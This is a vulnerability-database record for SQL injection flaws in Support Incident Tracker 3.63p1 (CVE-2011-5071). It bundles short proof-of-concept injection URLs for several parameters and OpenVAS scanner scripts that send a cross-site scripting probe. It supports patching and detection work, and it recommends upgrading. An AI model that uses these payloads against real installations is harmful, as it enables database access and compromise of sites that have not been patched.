ID EDB-ID:35986 Type exploitdb Reporter Yuri Goltsev Modified 2011-07-26T00:00:00
Description
SQL injection through the sites[] parameter of billable_incidents.php in Support Incident Tracker (SiT!) 3.63 p1 (CVE-2011-5071). Web application exploit for the PHP platform.
source: http://www.securityfocus.com/bid/48896/info
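Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. The CVE-2011-5071 record groups four injection points: the exc[] parameter of report_marketing.php, the selected[] parameter of tasks.php, the sites[] parameter of billable_incidents.php, and the search_string parameter of search.php. This entry covers sites[].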
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
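Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. The CVE-2011-5071 record places these SQL injection flaws in versions before 3.64, and the OpenVAS check that covers this CVE recommends upgrading to version 3.65 or later.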
http://www.example.com/sit/billable_incidents.php?sites[]=-1 union select 1,concat_ws(':',user(),database())
{"id": "EDB-ID:35986", "hash": "f2de0121094b8955420917a6063a91d4", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Support Incident Tracker SiT! 3.63 p1 - billable_incidents.php sites Parameter SQL Injection", "description": "Support Incident Tracker (SiT!) 3.63 p1 billable_incidents.php sites[] Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform", "published": "2011-07-26T00:00:00", "modified": "2011-07-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/35986/", "reporter": "Yuri Goltsev", "references": [], "cvelist": ["CVE-2011-5071"], "lastseen": "2016-02-04T02:26:28", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2016-02-04T02:26:28"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-5071"]}, {"type": "exploitdb", "idList": ["EDB-ID:35988", "EDB-ID:35985", "EDB-ID:35987"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310802388", "OPENVAS:802388"]}], "modified": "2016-02-04T02:26:28"}, "vulnersScore": 6.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/35986/", "sourceData": "source: http://www.securityfocus.com/bid/48896/info\r\n \r\nSupport Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n \r\nSupport Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. 
\r\n\r\nhttp://www.example.com/sit/billable_incidents.php?sites[]=-1 union select 1,concat_ws(':',user(),database())", "osvdbidlist": ["74067"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:11:25", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in Support Incident Tracker (aka SiT!) before 3.64 allow remote attackers to execute arbitrary SQL commands via the (1) exc[] parameter to report_marketing.php, (2) selected[] parameter to tasks.php, (3) sites[] parameter to billable_incidents.php, or (4) search_string parameter to search.php. NOTE: some of these details are obtained from third party information.", "modified": "2012-02-02T05:00:00", "id": "CVE-2011-5071", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5071", "published": "2012-01-29T04:04:00", "title": "CVE-2011-5071", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T02:26:43", "bulletinFamily": "exploit", "description": "Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform", "modified": "2011-07-26T00:00:00", "published": "2011-07-26T00:00:00", "id": "EDB-ID:35988", "href": "https://www.exploit-db.com/exploits/35988/", "type": "exploitdb", "title": "Support Incident Tracker SiT! 3.63 p1 - tasks.php selected Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/48896/info\r\n \r\nSupport Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n \r\nSupport Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. 
\r\n\r\nhttp://www.example.com/sit/tasks.php?selected[]=1'&action=markcomplete", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35988/"}, {"lastseen": "2016-02-04T02:26:21", "bulletinFamily": "exploit", "description": "Support Incident Tracker (SiT!) 3.63 p1 report_marketing.php exc[] Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform", "modified": "2011-07-26T00:00:00", "published": "2011-07-26T00:00:00", "id": "EDB-ID:35985", "href": "https://www.exploit-db.com/exploits/35985/", "type": "exploitdb", "title": "Support Incident Tracker SiT! 3.63 p1 - report_marketing.php exc Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/48896/info\r\n\r\nSupport Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n\r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n\r\nSupport Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/sit/report_marketing.php?mode=report&exc[0]=1'", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35985/"}, {"lastseen": "2016-02-04T02:26:36", "bulletinFamily": "exploit", "description": "Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform", "modified": "2011-07-26T00:00:00", "published": "2011-07-26T00:00:00", "id": "EDB-ID:35987", "href": "https://www.exploit-db.com/exploits/35987/", "type": "exploitdb", "title": "Support Incident Tracker SiT! 
3.63 p1 search.php search_string Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/48896/info\r\n \r\nSupport Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n \r\nSupport Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/sit/search.php?search_string=1' union select 1,version() ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35987/"}], "openvas": [{"lastseen": "2017-07-02T21:10:40", "bulletinFamily": "scanner", "description": "This host is running Support Incident Tracker and is prone to\n multiple sql injection and cross site scripting vulnerabilities.", "modified": "2017-04-14T00:00:00", "published": "2012-02-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802388", "id": "OPENVAS:802388", "title": "Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sit_mult_sql_inj_and_xss_vuln.nasl 5956 2017-04-14 09:02:12Z teissa $\n#\n# Support Incident Tracker SiT! 
Multiple SQL Injection And XSS Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary HTML and\n script code in a user's browser session in the context of a vulnerable site\n and to cause SQL Injection attack to gain sensitive information.\n Impact Level: Application\";\ntag_affected = \"Support Incident Tracker before 3.65\";\ntag_insight = \"The flaws are due to improper input validation errors in multiple\n scripts before being used in SQL queries and also allows attackers to\n execute arbitrary HTML.\";\ntag_solution = \"Upgrade to the Support Incident Tracker version 3.65 or later,\n For updates refer to http://sitracker.org/\";\ntag_summary = \"This host is running Support Incident Tracker and is prone to\n multiple sql injection and cross site scripting vulnerabilities.\";\n\nif(description)\n{\n script_id(802388);\n script_version(\"$Revision: 5956 $\");\n script_cve_id(\"CVE-2011-5071\", \"CVE-2011-5072\", \"CVE-2011-5073\", \"CVE-2011-5074\",\n \"CVE-2011-5075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 15:15:30 +0530 (Wed, 01 Feb 2012)\");\n script_name(\"Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/46019\");\n script_xref(name : \"URL\" , value : \"http://sitracker.org/wiki/ReleaseNotes365\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/519636\");\n script_xref(name : \"URL\" , value : \"https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"support_incident_tracker_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"sit/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Get HTTP port\nsitPort = get_http_port(default:80);\nif(!sitPort){\n exit(0);\n}\n\n## Get the version from KB\ndir = get_dir_from_kb(port:sitPort,app:\"support_incident_tracker\");\nif(!dir){\n exit(0);\n}\n\n## Get Host name\nhost = get_host_name();\nif(!host){\n exit(0);\n}\n\nurl = dir + \"/forgotpwd.php?userid=1&action=sendpwd\";\nreq = string(\"GET \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: 
'<script>alert(document.cookie);</script>\\r\\n\",\n \"Authorization: Basic bGFtcHA6\\r\\n\\r\\n\");\n\n## Send the attack request\nres = http_keepalive_send_recv(port:sitPort, data:req);\n\n## Confirm exploit worked by checking the response\nif(ereg(pattern:\"^HTTP/[0-9]\\.[0-9] 200 .*\", string:res) &&\n \"<script>alert(document.cookie);</script>\" >< res)\n{\n security_message(sitPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-12-06T16:45:12", "bulletinFamily": "scanner", "description": "This host is running Support Incident Tracker and is prone to\n multiple sql injection and cross-site scripting vulnerabilities.", "modified": "2019-12-05T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:1361412562310802388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802388", "title": "Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802388\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_cve_id(\"CVE-2011-5071\", \"CVE-2011-5072\", \"CVE-2011-5073\", \"CVE-2011-5074\",\n \"CVE-2011-5075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 15:15:30 +0530 (Wed, 01 Feb 2012)\");\n script_name(\"Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46019\");\n script_xref(name:\"URL\", value:\"http://sitracker.org/wiki/ReleaseNotes365\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/519636\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_dependencies(\"support_incident_tracker_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"sit/installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\n script code in a user's browser session in the context of a vulnerable site\n and to cause 
SQL Injection attack to gain sensitive information.\");\n script_tag(name:\"affected\", value:\"Support Incident Tracker before version 3.65.\");\n script_tag(name:\"insight\", value:\"The flaws are due to improper input validation errors in multiple\n scripts before being used in SQL queries and also allows attackers to\n execute arbitrary HTML.\");\n script_tag(name:\"solution\", value:\"Upgrade to the Support Incident Tracker version 3.65 or later.\");\n script_tag(name:\"summary\", value:\"This host is running Support Incident Tracker and is prone to\n multiple sql injection and cross-site scripting vulnerabilities.\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nCPE = 'cpe:/a:sitracker:support_incident_tracker';\n\nif(!sitPort = get_app_port(cpe:CPE))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:sitPort))\n exit(0);\n\nhost = http_host_name(port:sitPort);\n\nurl = dir + \"/forgotpwd.php?userid=1&action=sendpwd\";\nreq = string(\"GET \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: '<script>alert(document.cookie);</script>\\r\\n\",\n \"Authorization: Basic bGFtcHA6\\r\\n\\r\\n\");\n\nres = http_keepalive_send_recv(port:sitPort, data:req);\n\nif(ereg(pattern:\"^HTTP/[0-9]\\.[0-9] 200 .*\", string:res) &&\n \"<script>alert(document.cookie);</script>\" >< res)\n{\n security_message(port:sitPort, data:\"The target host was found to be vulnerable.\");\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}